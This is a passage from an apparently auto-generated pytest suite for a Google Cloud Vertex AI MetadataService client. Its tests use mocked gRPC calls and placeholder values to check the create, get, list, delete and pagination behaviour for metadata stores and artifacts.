# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_metadata_store(
parent="parent_value",
metadata_store=gca_metadata_store.MetadataStore(name="name_value"),
metadata_store_id="metadata_store_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].metadata_store
mock_val = gca_metadata_store.MetadataStore(name="name_value")
assert arg == mock_val
arg = args[0].metadata_store_id
mock_val = "metadata_store_id_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_metadata_store_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_metadata_store(
metadata_service.CreateMetadataStoreRequest(),
parent="parent_value",
metadata_store=gca_metadata_store.MetadataStore(name="name_value"),
metadata_store_id="metadata_store_id_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.GetMetadataStoreRequest,
dict,
],
)
def test_get_metadata_store(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_store.MetadataStore(
name="name_value",
description="description_value",
)
response = client.get_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetMetadataStoreRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_store.MetadataStore)
assert response.name == "name_value"
assert response.description == "description_value"
def test_get_metadata_store_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_store), "__call__"
) as call:
client.get_metadata_store()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetMetadataStoreRequest()
@pytest.mark.asyncio
async def test_get_metadata_store_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.GetMetadataStoreRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_store.MetadataStore(
name="name_value",
description="description_value",
)
)
response = await client.get_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetMetadataStoreRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_store.MetadataStore)
assert response.name == "name_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_get_metadata_store_async_from_dict():
await test_get_metadata_store_async(request_type=dict)
def test_get_metadata_store_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetMetadataStoreRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_store), "__call__"
) as call:
call.return_value = metadata_store.MetadataStore()
client.get_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_metadata_store_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetMetadataStoreRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_store), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_store.MetadataStore()
)
await client.get_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_get_metadata_store_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_store.MetadataStore()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_metadata_store(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_metadata_store_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_metadata_store(
metadata_service.GetMetadataStoreRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_get_metadata_store_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_store.MetadataStore()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_metadata_store(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_metadata_store_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_metadata_store(
metadata_service.GetMetadataStoreRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.ListMetadataStoresRequest,
dict,
],
)
def test_list_metadata_stores(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListMetadataStoresResponse(
next_page_token="next_page_token_value",
)
response = client.list_metadata_stores(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListMetadataStoresRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListMetadataStoresPager)
assert response.next_page_token == "next_page_token_value"
def test_list_metadata_stores_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
client.list_metadata_stores()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListMetadataStoresRequest()
@pytest.mark.asyncio
async def test_list_metadata_stores_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.ListMetadataStoresRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListMetadataStoresResponse(
next_page_token="next_page_token_value",
)
)
response = await client.list_metadata_stores(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListMetadataStoresRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListMetadataStoresAsyncPager)
assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_metadata_stores_async_from_dict():
await test_list_metadata_stores_async(request_type=dict)
def test_list_metadata_stores_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListMetadataStoresRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
call.return_value = metadata_service.ListMetadataStoresResponse()
client.list_metadata_stores(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_metadata_stores_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListMetadataStoresRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListMetadataStoresResponse()
)
await client.list_metadata_stores(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_list_metadata_stores_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListMetadataStoresResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_metadata_stores(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_metadata_stores_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_metadata_stores(
metadata_service.ListMetadataStoresRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_metadata_stores_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListMetadataStoresResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_metadata_stores(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_metadata_stores_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_metadata_stores(
metadata_service.ListMetadataStoresRequest(),
parent="parent_value",
)
def test_list_metadata_stores_pager(transport_name: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
next_page_token="abc",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[],
next_page_token="def",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
),
RuntimeError,
)
metadata = (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
pager = client.list_metadata_stores(request={})
assert pager._metadata == metadata
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, metadata_store.MetadataStore) for i in results)
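# Outside of tests, the pager is normally consumed lazily; iteration pulls
# additional pages on demand using next_page_token, e.g. (illustrative):
#
#   for store in client.list_metadata_stores(parent="projects/p/locations/l"):
#       print(store.name)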
def test_list_metadata_stores_pages(transport_name: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
next_page_token="abc",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[],
next_page_token="def",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
),
RuntimeError,
)
pages = list(client.list_metadata_stores(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_metadata_stores_async_pager():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores),
"__call__",
new_callable=mock.AsyncMock,
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
next_page_token="abc",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[],
next_page_token="def",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
),
RuntimeError,
)
async_pager = await client.list_metadata_stores(
request={},
)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager: # pragma: no branch
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, metadata_store.MetadataStore) for i in responses)
@pytest.mark.asyncio
async def test_list_metadata_stores_async_pages():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores),
"__call__",
new_callable=mock.AsyncMock,
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
next_page_token="abc",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[],
next_page_token="def",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
),
RuntimeError,
)
pages = []
async for page_ in (
await client.list_metadata_stores(request={})
).pages: # pragma: no branch
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize(
"request_type",
[
metadata_service.DeleteMetadataStoreRequest,
dict,
],
)
def test_delete_metadata_store(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.delete_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteMetadataStoreRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_delete_metadata_store_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_metadata_store), "__call__"
) as call:
client.delete_metadata_store()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteMetadataStoreRequest()
@pytest.mark.asyncio
async def test_delete_metadata_store_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.DeleteMetadataStoreRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.delete_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteMetadataStoreRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_delete_metadata_store_async_from_dict():
await test_delete_metadata_store_async(request_type=dict)
def test_delete_metadata_store_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteMetadataStoreRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_metadata_store), "__call__"
) as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.delete_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
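# How the header asserted above is produced: the client serializes URI-bound
# request fields through gapic_v1.routing_header. A minimal sketch (the helper
# name is ours; to_grpc_metadata is the same call the pager test below uses):
def _example_routing_header():
    # Returns ("x-goog-request-params", "name=name_value"), the exact pair
    # asserted in the field-header tests throughout this file.
    return gapic_v1.routing_header.to_grpc_metadata((("name", "name_value"),))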
@pytest.mark.asyncio
async def test_delete_metadata_store_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteMetadataStoreRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_metadata_store), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.delete_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_delete_metadata_store_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_metadata_store(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_metadata_store_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_metadata_store(
metadata_service.DeleteMetadataStoreRequest(),
name="name_value",
)
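# The two mutually exclusive calling conventions exercised above, side by side
# (a sketch; the resource name is a placeholder):
#
#     client.delete_metadata_store(
#         request=metadata_service.DeleteMetadataStoreRequest(name="...")
#     )
#     client.delete_metadata_store(name="...")
#
# Supplying a request object *and* flattened keyword fields is ambiguous, so
# the client raises ValueError, as the test above asserts.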
@pytest.mark.asyncio
async def test_delete_metadata_store_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name="operations/spam")
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_metadata_store(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_metadata_store_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_metadata_store(
metadata_service.DeleteMetadataStoreRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.CreateArtifactRequest,
dict,
],
)
def test_create_artifact(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_artifact.Artifact(
name="name_value",
display_name="display_name_value",
uri="uri_value",
etag="etag_value",
state=gca_artifact.Artifact.State.PENDING,
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.create_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_artifact.Artifact)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.uri == "uri_value"
assert response.etag == "etag_value"
assert response.state == gca_artifact.Artifact.State.PENDING
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_create_artifact_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_artifact), "__call__") as call:
client.create_artifact()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateArtifactRequest()
@pytest.mark.asyncio
async def test_create_artifact_async(
transport: str = "grpc_asyncio", request_type=metadata_service.CreateArtifactRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_artifact.Artifact(
name="name_value",
display_name="display_name_value",
uri="uri_value",
etag="etag_value",
state=gca_artifact.Artifact.State.PENDING,
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.create_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_artifact.Artifact)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.uri == "uri_value"
assert response.etag == "etag_value"
assert response.state == gca_artifact.Artifact.State.PENDING
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_create_artifact_async_from_dict():
await test_create_artifact_async(request_type=dict)
def test_create_artifact_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateArtifactRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_artifact), "__call__") as call:
call.return_value = gca_artifact.Artifact()
client.create_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_artifact_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateArtifactRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_artifact), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_artifact.Artifact()
)
await client.create_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_create_artifact_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_artifact.Artifact()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_artifact(
parent="parent_value",
artifact=gca_artifact.Artifact(name="name_value"),
artifact_id="artifact_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].artifact
mock_val = gca_artifact.Artifact(name="name_value")
assert arg == mock_val
arg = args[0].artifact_id
mock_val = "artifact_id_value"
assert arg == mock_val
def test_create_artifact_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_artifact(
metadata_service.CreateArtifactRequest(),
parent="parent_value",
artifact=gca_artifact.Artifact(name="name_value"),
artifact_id="artifact_id_value",
)
@pytest.mark.asyncio
async def test_create_artifact_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            gca_artifact.Artifact()
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_artifact(
parent="parent_value",
artifact=gca_artifact.Artifact(name="name_value"),
artifact_id="artifact_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].artifact
mock_val = gca_artifact.Artifact(name="name_value")
assert arg == mock_val
arg = args[0].artifact_id
